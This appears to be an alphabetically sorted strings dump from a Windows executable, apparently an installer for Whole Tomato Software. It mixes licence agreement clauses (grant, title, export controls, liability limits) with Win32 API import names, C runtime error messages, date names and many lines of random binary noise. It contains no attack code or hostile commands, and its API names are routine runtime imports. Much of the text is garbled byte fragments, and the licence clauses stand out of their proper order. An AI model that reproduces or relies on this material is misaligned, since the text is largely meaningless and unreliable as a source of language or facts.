EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. 
Eyt7aY\
 <ez;Ay
e{Z.!i
FAX&d7`x
February
FindWindowA
fj&7	c
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
{]FRTxd*
g|D\4\
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
GjsZCJS:#*3
G	<>L|f
Go=\!{
GRANT. Subject to the terms of this Agreement, Whole Tomato Software, Inc. ("Whole Tomato") hereby grants you a limited, personal, nontransferable, nonsublicensable, royalty-free, nonexclusive license to use one copy of the client software product you are about to install in object code form ("Software"). You may copy the Software for archival purposes, provided any copy must contain all of the original Software's proprietary notices. 
gZn#Osq{L
H2X"(R8E
H3X"(R8B
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
>hg:RZ4
HH:mm:ss
"@hp_Tn_h
HvxL`':!
\i	}~)
|ibcdq
i@gMj'
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IpM=Tc?
IsDebuggerPresent
IsValidCodePage
i{x:%{
j`(%1o
JanFebMarAprMayJunJulAugSepOctNovDec
January
J.a\qL
[jH/ry)@o
jH[Vy 
j@j ^V
jpAFjV
JTUDox
j"Vj-j
jW\Z_kX
KERNEL32.dll
KM#}1R
K|o!z>t
kPIDD)
kupW->#.
Kx{NAd
k	(y-i
l1)O~w
(l2z u
l4zKae
Last modified: May 9, 2012
-lb_W$
LCMapStringA
LCMapStringW
Ld<e,L
LeaveCriticalSection
\(LE|(l9
lem%_B3
LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective 
LK;	RJ
lmSp8a
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadLibraryA
LoadStringA
LrY~B@iDb
lstrcmpiA
LSxCT3p
lV0S $
l@vL2}7"
+Ly(ka
M0nt~d
m7;Z%u
MessageBoxA
Microsoft Visual C++ Runtime Library
MISCELLANEOUS. This Agreement represents the complete agreement concerning this license between the parties and supersedes all prior agreements and representations between them. It may be amended only by a writing executed by both parties. If any provision of this Agreement is held to be unenforceable for any reason, such provision shall be reformed only to the extent necessary to make it enforceable. This Agreement shall be governed by and construed under California law as such law applies to agreements between California residents entered into and to be performed within California. 
MM/dd/yy
M|mIPf
mo9*$Di
Monday
mu1Q@R@Ny
MultiByteToWideChar
n4c8>gk2
N&9Z/W
NB^Rnb~
-N#<'D
Nd^tnE~i
Nd^uny~V
=<NGVu3g
N[h'B\
(nhNhn
nhNhn(
(NHnHn
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
^#O3?C/S
_#O3?C/S
October
OewI8c~
OFd\le
(}@p<1
p;8Yh%
'pd*0'=#
Please contact the application's support team for more information.
PPPPPPPP
Program: 
<program name unknown>
- pure virtual function call
Q,.'1z
qgAWQG!Ta
?:qH$9
ql8&T6W
|Qla\qL
$|Qla\qL
\<Qla\qL
QlaQq 
QlaQq)
%Q#n)t6
QueryPerformanceCounter
QwK[:XA
QZa2q+
r *[1T
r/47;:X
r/7Z}b
`.rdata
rDbTRd
rDbTRdBt2
/RDjF\(
,r\DU'
)rEcNHPCK
Rectangle
RegConnectRegistryA
RegisterClassExA
RegOpenKeyExA
[r>l"=k
RtlUnwind
runtime error 
Runtime Error!
R/uSpr
r^Y1Fd
Saturday
SbmnY[
September
SetHandleCount
SetLastError
SetParent
SetUnhandledExceptionFilter
s{$Fi>
ShowWindow
SING error
SOFTWARE LICENSE AGREEMENT
s'RoGP
strcat
sU?D]>Hns
Sunday
SunMonTueWedThuFriSat
sZ)Qm4
t~;}?	
t|>'^#
$<t#D`n
TerminateProcess
TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. 
TextOutA
t>f1+\
t*[!)g
\TgaO3
tGA@T>
t$h4xB
The Software may be installed on more than one computer provided that you are the exclusive user of the Software. As used in this context, "you" shall be defined as an individual human person.
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
This Software is protected by both the United States copyright laws and international copyright treaty provisions. You must treat the Software like any other copyrighted material -- for example, a book, except that you may copy it onto a computer to be used and you may make archival copies of the Software for the sole purpose of backing-up our Software and protecting your investment from loss. 
Thursday
TITLE. As between the parties, title, ownership rights, and intellectual property rights in and to the Software, and any copies or portions thereof, shall remain in Whole Tomato and its suppliers or licensors. The Software is protected by the copyright laws of the United States and international copyright treaties. Title, ownership rights, and intellectual property rights in and to any software, data, information, text, pictures, images, or other content ("Content") accessed through the Software or otherwise is the property of the applicable owner and may be protected by applicable copyright or other law. This License gives you no rights, title, or interest to Content (including without limitation Content that you create using the Software). 
$t	jpY
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateAcceleratorA
TranslateMessage
t"SS9]
t$<"u	3
Tuesday
t,USSVh
;t$,v-
t+WWVPV
@;U7$)
?U8B j_w
U/E_=O%%
u'gf?S
!uKe{Uk
- unable to initialize heap
- unable to open console device
UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. 
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UpdateWindow
UQPXY]Y[
URPQQh
U,RZ T
USER32.dll
USER32.DLL
U.S. GOVERNMENT RESTRICTED RIGHTS. Use, duplication or disclosure by the Government is subject to restrictions set forth in subparagraphs (a) through (d) of the Commercial Computer-Restricted Rights clause at FAR 52.227-19 when applicable, or in subparagraph (c) (1) (ii) of the Rights in Technical Data and Computer Software clause in DFARS 252.227-7013, and in similar clauses in the NASA FAR Supplement. 
UtVbLe
<v,(c[
vfK^sLD
vfP/$h
VirtualAlloc
VirtualFree
v	N+D$
V,(@Y#
[W^aV6~
wcElt|!
Wednesday
 W(GF/
WideCharToMultiByte
WriteFile
wwwwwwwwwww
Wy(,~i~
X4TXKni~
x96rP!
*XC8Cq
xHRW{FA
}X!}Ie
.=Xyh'
<X!?ZZ
Y7i'yW	G
Y{'$H)/_!
You may not, directly or indirectly: modify, translate, reverse engineer, decompile, disassemble (except to the extent applicable laws specifically prohibit such restriction), create derivative works based on, or otherwise attempt to discover the source code or underlying ideas or algorithms of the Software; or copy (except for archival purposes as set forth above), rent, lease, distribute, transfer or otherwise transfer rights to the Software; use the Software for timesharing or service bureau purposes; or remove any proprietary notices or labels on the Software. 
yQ|$lZ
>=Yt1j
-Z{K&H
<z,~\nSA
 `zrh5
Z*V|W2
Z]yW =@w